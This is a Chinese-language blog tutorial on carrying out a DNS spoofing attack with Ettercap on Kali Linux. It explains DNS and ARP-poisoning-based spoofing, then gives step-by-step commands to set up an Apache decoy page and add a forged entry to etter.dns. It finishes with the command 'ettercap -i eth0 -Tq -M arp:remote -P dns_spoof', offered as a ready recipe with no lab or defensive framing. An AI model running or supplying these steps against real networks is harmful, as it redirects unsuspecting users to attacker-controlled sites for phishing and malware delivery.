1.下载系统

https://www.kali.org/downloads/下载kali系统 0

2.安装系统

请参考教程,

2.换源&&更新系统

输入

nano /etc/apt/sources.list

1

加入下列源

2

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

键盘按Ctrl+X键保存

3

按Y确定保存

4

更新软件源

sudo apt-get update

5 更新系统

sudo apt-get upgrade -y

6 7

3.了解下什么是dns

DNS即Domain Name System 的缩写,是把主机域名解析IP地址的系统,解决了IP地址难记的问题,用相对好记的域名就可以对服务器进行访问,即使服务器更换了IP地址,我们依旧可以通过域名访问该服务器,这样能够使我们更方便的访问互联网。DNS域名查询请求与回应的过程可简单描述成以下五个步骤:1、网络用户的浏览器提出将域名转换为IP地址的请求;2、地址解析程序resolve生成查询报文;3、地址解程序将查询请求语句封装在UDP包中发送出去;4、DNS服务器查找到IP地址并生成相应报文;5、DNS服务器将查询结果封装到UDP报文中发回给查询者。

4.了解DNS欺骗原理

尽管DNS在互联网中扮演着如此重要的角色,但是在设计DNS协议时,设计者没有考虑到一些安全问题,导致了DNS的安全隐患与缺陷[2]。DNS欺骗就是利用了DNS协议设计时的一个非常严重的安全缺陷。首先欺骗者向目标机器发送构造好的ARP应答数据包,ARP欺骗成功后,嗅探到对方发出的DNS请求数据包,分析数据包取得ID和端口号后,向目标发送自己构造好的一个DNS返回包,对方收到DNS应答包后,发现ID和端口号全部正确,即把返回数据包中的域名和对应的IP地址保存进DNS缓存表中,而后来的当真实的DNS应答包返回时则被丢弃。

以用户访问新浪网为例,DNS服务器的域名映射表中有一条信息是:新浪网站的IP地址是119.75.217.109,如果此映射信息中的IP地址被篡改为192.168.83.128。当用户访问新浪www.sina.com.cn网站时,从DNS上解析回来的目的IP地址就变成了192.168.83.128,用户主机按照步骤向192.168.83.128发送请求,收到的确实恶意攻击或进入不希望访问的网址。

DNS欺骗的危害是巨大的,常见被利用来钓鱼、挂马等,这在用户访问自己的银行账户,在线购书网站甚至是网页电子邮件时显得尤为重要。通常情况下,除非发生欺骗攻击,否则你不可能知道你的DNS已经被欺骗,只是你打开的网页与你想要看到的网页有所不同。在很多针对性的攻击中,用户都无法知道自己已经将网上银行帐号信息输入到错误的网址,直到接到银行的电话告知其帐号,已购买某某高价商品时用户才会知道。

3.开始设置欺骗网站

1.下载apache

sudo apt-get install apache2 -y

8

2.更改网页

nano /var/www/html/index.html

9

删除整个文件中的内容

10

修改为

<a href="http://baidu.com">baidu.com</a>

11

键盘按Ctrl+X键保存

然后启动Apache服务

service apache2 start

查看kali系统的ip地址:

ifconfig

18

12

打开电脑浏览器,观察是否成功运行

13

配置欺骗网址

打开配置文件

cd /etc/ettercap
nano etter.dns

14

15

在下面增加一条

16

www.lajiruiyi.com A 192.168.1.100

他的意思是:域名:www.lajiruiyi.com使用A记录指向IP地址:192.168.1.100,这里可以根据需要更改

17

开始欺骗

查看网卡

ifconfig

18

可以看到eth0的网卡是192.168.1.100的网卡

所以使用攻击命令

ettercap -i eth0 -Tq -M arp:remote -P dns_spoof

20

看到如下即为攻击成功

21

现在打开http://www.lajiruiyi.com/看看效果

19

攻击完成













本作品
 
利用Kali Linux的Ettercap工具实施DNS欺骗攻击采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议进行许可。
基于 http://www.GloomyGhost.com/2018/11/22/kaliEttercap.html上的作品创作。


赞赏